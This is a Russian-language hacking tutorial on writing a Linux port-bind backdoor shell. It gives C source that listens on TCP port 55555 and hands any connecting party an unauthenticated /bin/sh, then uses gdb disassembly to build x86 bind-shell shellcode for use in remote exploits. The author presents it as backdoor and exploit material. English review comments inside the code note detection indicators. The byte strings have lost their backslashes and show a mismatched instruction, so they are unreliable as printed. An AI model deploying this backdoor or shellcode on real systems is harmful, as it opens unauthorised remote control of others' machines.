Что такое Port-shell, я думаю, вы знаете: это программа, которая открывает доступ к шеллу на определенном порту. Запустив такую программу, вы сможете подсоединяться к удаленному хосту и выполнять любые команды на этой удаленной машине с теми привилегиями, с которыми была запущена данная программа.
Вообще, на написание данной статьи меня толкнула одна статья. Дело в том, что в ней писали о backdoor'е, который записывал в /etc/passwd новый аккаунт с привилегиями рута (uid=0; gid=0) при посылке определенной команды на определенный порт. Мне же не очень понравилась эта идея, так как к удаленному компьютеру невозможно было бы подсоединиться, если бы на нем отсутствовали такие утилиты, как telnetd, sshd и т.п. Не было бы толку от этого бэкдора при их отсутствии, поэтому нужен шелл. Вот мы и примемся за его написание.
Сам код программы не очень большой, так как программа всего-навсего открывает нужный нам порт и запускает оболочку, ввод и вывод которой привязаны к дескриптору сокета:
// все нужные и ненужные инклуды
/*
 * File-scope state shared with main(). Being static-storage objects they
 * are zero-initialized, so every field of the two address structs that
 * main() does not assign explicitly (e.g. sin_zero) starts out as 0.
 */
int soc,cli;                    /* listening socket, accepted client socket */
struct sockaddr_in serv_addr;   /* local address the listener is bound to */
struct sockaddr_in cli_addr;    /* peer address filled in by accept() */
/*
 * Entry point of the bind shell.
 *
 * The parent process falls straight through to the end of main() and exits,
 * so only the forked child does any work: it binds TCP port 55555 on every
 * local interface (INADDR_ANY), waits for exactly one connection, redirects
 * its stdin/stdout/stderr onto that connection and replaces itself with
 * /bin/sh. Whoever connects therefore gets an unauthenticated interactive
 * shell running with the privileges this program was started with.
 *
 * Review notes (risk / detection):
 *  - There is no authentication, no peer-address restriction and no
 *    transport protection; anything that can reach the port gets the shell.
 *  - None of the calls below (fork, socket, bind, listen, accept, dup2,
 *    execl) has its return value checked, so failures are silent.
 *  - The listener backlog is 1 and accept() is called once: a single
 *    connection is served, after which the socket belongs to the shell.
 *  - Host-side indicators that follow directly from this code: a process
 *    listening on TCP/55555, and a /bin/sh whose descriptors 0, 1 and 2
 *    are all the same socket rather than a tty or pipe.
 *
 * Returns: nothing meaningful; main() has no explicit return statement in
 * either branch (the parent's exit status is whatever falls out of main).
 */
int main()
{
if(fork()==0)
{
/* child: set up an IPv4 listener on every interface, port 55555 */
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(55555);
soc=socket(AF_INET,SOCK_STREAM,0);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
listen(soc,1);                  /* backlog of one: a single pending connection */
cli=accept(soc,(struct sockaddr *)&cli_addr,sizeof(cli_addr));
/* point stdin, stdout and stderr at the accepted connection */
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
/* replace this process image with the shell; it inherits the socket as its std streams */
execl("/bin/sh","sh",0);
}
/* parent (and the child only if execl fails) exits here */
}
Вот и весь код =). Но это еще не все. Данный код очень удобно использовать для написания remote exploits. Все, что нужно, — перевести данный код в ассемблерный и вытащить ОПКОД. Этим мы и займемся: пользоваться мы будем gdb. Итак, поехали:
(gdb) disas dup2
Dump of assembler code for function dup2:
0x804cbe0 : movl %ebx,%edx
0x804cbe2 : movl 0x8(%esp,1),%ecx
0x804cbe6 : movl 0x4(%esp,1),%ebx
0x804cbea : movl $0x3f,%eax
0x804cbef : int $0x80
0x804cbf1 : movl %edx,%ebx
0x804cbf3 : cmpl $0xfffff001,%eax
0x804cbf8 : jae 0x804cdc0 <__syscall_error>
0x804cbfe : ret
0x804cbff : nop
End of assembler dump.
(gdb) disas fork
Dump of assembler code for function fork:
0x804ca90 : movl $0x2,%eax
0x804ca95 : int $0x80
0x804ca97 : cmpl $0xfffff001,%eax
0x804ca9c : jae 0x804cdc0 <__syscall_error>
0x804caa2 : ret
0x804caa3 : nop
0x804caa4 : nop
0x804caa5 : nop
0x804caa6 : nop
0x804caa7 : nop
0x804caa8 : nop
0x804caa9 : nop
0x804caaa : nop
0x804caab : nop
0x804caac : nop
0x804caad : nop
0x804caae : nop
0x804caaf : nop
End of assembler dump.
(gdb) disas socket
Dump of assembler code for function socket:
0x804cda0 : movl %ebx,%edx
0x804cda2 : movl $0x66,%eax
0x804cda7 : movl $0x1,%ebx
0x804cdac : leal 0x4(%esp,1),%ecx
0x804cdb0 : int $0x80
0x804cdb2 : movl %edx,%ebx
0x804cdb4 : cmpl $0xffffff83,%eax
0x804cdb7 : jae 0x804cdc0 <__syscall_error>
0x804cdbd : ret
0x804cdbe : nop
0x804cdbf : nop
End of assembler dump.
(gdb) disas bind
Dump of assembler code for function bind:
0x804cd60 : movl %ebx,%edx
0x804cd62 : movl $0x66,%eax
0x804cd67 : movl $0x2,%ebx
0x804cd6c : leal 0x4(%esp,1),%ecx
0x804cd70 : int $0x80
0x804cd72 : movl %edx,%ebx
0x804cd74 : cmpl $0xffffff83,%eax
0x804cd77 : jae 0x804cdc0 <__syscall_error>
0x804cd7d : ret
0x804cd7e : nop
0x804cd7f : nop
End of assembler dump.
(gdb) disas listen
Dump of assembler code for function listen:
0x804cd80 : movl %ebx,%edx
0x804cd82 : movl $0x66,%eax
0x804cd87 : movl $0x4,%ebx
0x804cd8c : leal 0x4(%esp,1),%ecx
0x804cd90 : int $0x80
0x804cd92 : movl %edx,%ebx
0x804cd94 : cmpl $0xffffff83,%eax
0x804cd97 : jae 0x804cdc0 <__syscall_error>
0x804cd9d : ret
0x804cd9e : nop
0x804cd9f : nop
End of assembler dump.
(gdb) disas accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>: movl %ebx,%edx
0x804cd42 <__accept+2>: movl $0x66,%eax
0x804cd47 <__accept+7>: movl $0x5,%ebx
0x804cd4c <__accept+12>: leal 0x4(%esp,1),%ecx
0x804cd50 <__accept+16>: int $0x80
0x804cd52 <__accept+18>: movl %edx,%ebx
0x804cd54 <__accept+20>: cmpl $0xffffff83,%eax
0x804cd57 <__accept+23>: jae 0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>: ret
0x804cd5e <__accept+30>: nop
0x804cd5f <__accept+31>: nop
End of assembler dump.
Сам ОПКОД для каждой из этих функций выглядит следующим образом:
dup2(cli,0)
----------------------------------------------------------------------
char code[]=
"x88xc3" /* movb %al,%bl */
"xb0x3f" /* movb $0x3f,%al */
"x31xc9" /* xorl %ecx,%ecx */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
fork()
----------------------------------------------------------------------
ñhar code[]=
"x31xc0" /* xorl %eax,%eax */
"xb0x02" /* movb $0x2,%al */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
socket(2,1,6)
----------------------------------------------------------------------
ñhar code[]=
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"x89xf1" /* movl %esi,%ecx */
"xb0x02" /* movb $0x2,%al */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x06" /* movb $0x6,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x01" /* movb $0x1,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
bind(soc,(struct sockaddr *)&serv_addr,0x10)
----------------------------------------------------------------------
ñhar code[]=
"x89xf1" /* movl %esi,%ecx */
"x89x06" /* movl %eax,(%esi) */
"xb0x02" /* movb $0x2,%al */
"x66x89x46x0c" /* movw %ax,0xc(%esi) */
"xb0x77" /* movb $0x77,%al */
"x66x89x46x0e" /* movw %ax,0xe(%esi) */
"x8dx46x0c" /* leal 0xc(%esi),%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x10" /* movl %eax,0x10(%esi) */
"xb0x10" /* movb $0x10,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x02" /* movb $0x2,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
listen(soc,1)
----------------------------------------------------------------------
char code[]=
"x89xf1" /* movl %esi,%ecx */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x04" /* movb $0x4,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
accept(soc,0,0)
----------------------------------------------------------------------
char code[]=
"x89xf1" /* movl %esi,%ecx */
"x89xf1" /* movl %eax,(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x05" /* movb $0x5,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
Теперь соединяем все это воедино и добавляем к этому вызов самого шелла — получаем следующую байдень:
char shellcode[]=
"x31xc0" /* xorl %eax,%eax */
"xb0x02" /* movb $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* testl %eax,%eax */
"x75x43" /* jne 0x43 */
"xebx43" /* jmp 0x43 */
"x5e" /* popl %esi */
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"x89xf1" /* movl %esi,%ecx */
"xb0x02" /* movb $0x2,%al */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x06" /* movb $0x6,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x01" /* movb $0x1,%bl */
"xcdx80" /* int $0x80 */
"x89x06" /* movl %eax,(%esi) */
"xb0x02" /* movb $0x2,%al */
"x66x89x46x0c" /* movw %ax,0xc(%esi) */
"xb0x77" /* movb $0x77,%al */
"x66x89x46x0e" /* movw %ax,0xe(%esi) */
"x8dx46x0c" /* leal 0xc(%esi),%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x10" /* movl %eax,0x10(%esi) */
"xb0x10" /* movb $0x10,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x02" /* movb $0x2,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 0x4 */
"xebx55" /* jmp 0x55 */
"xebx5b" /* jmp 0x5b */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x04" /* movb $0x4,%bl */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x05" /* movb $0x5,%bl */
"xcdx80" /* int $0x80 */
"x88xc3" /* movb %al,%bl */
"xb0x3f" /* movb $0x3f,%al */
"x31xc9" /* xorl %ecx,%ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f,%al */
"xb1x01" /* movb $0x1,%cl */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f,%al */
"xb1x02" /* movb $0x2,%cl */
"xcdx80" /* int $0x80 */
"xb8x2fx62x69x6e" /* movl $0x6e69622f,%eax */
"x89x06" /* movl %eax,(%esi) */
"xb8x2fx73x68x2f" /* movl $0x2f68732f,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x88x46x07" /* movb %al,0x7(%esi) */
"x89x76x08" /* movl %esi,0x8(%esi) */
"x89x46x0c" /* movl %eax,0xc(%esi) */
"xb0x0b" /* movb $0xb,%al */
"x89xf3" /* movl %esi,%ebx */
"x8dx4ex08" /* leal 0x8(%esi),%ecx */
"x8dx56x0c" /* leal 0xc(%esi),%edx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax,%eax */
"xb0x01" /* movb $0x1,%al */
"x31xdb" /* xorl %ebx,%ebx */
"xcdx80" /* int $0x80 */
"xe8x5bxffxffxff"; /* call -0xa5 */
Ничего не понятно? Попробуйте проделать это на своей машине и привести к подобному виду. Кстати, как видите, код написан под Линукс, попробуйте его переделать под BSD.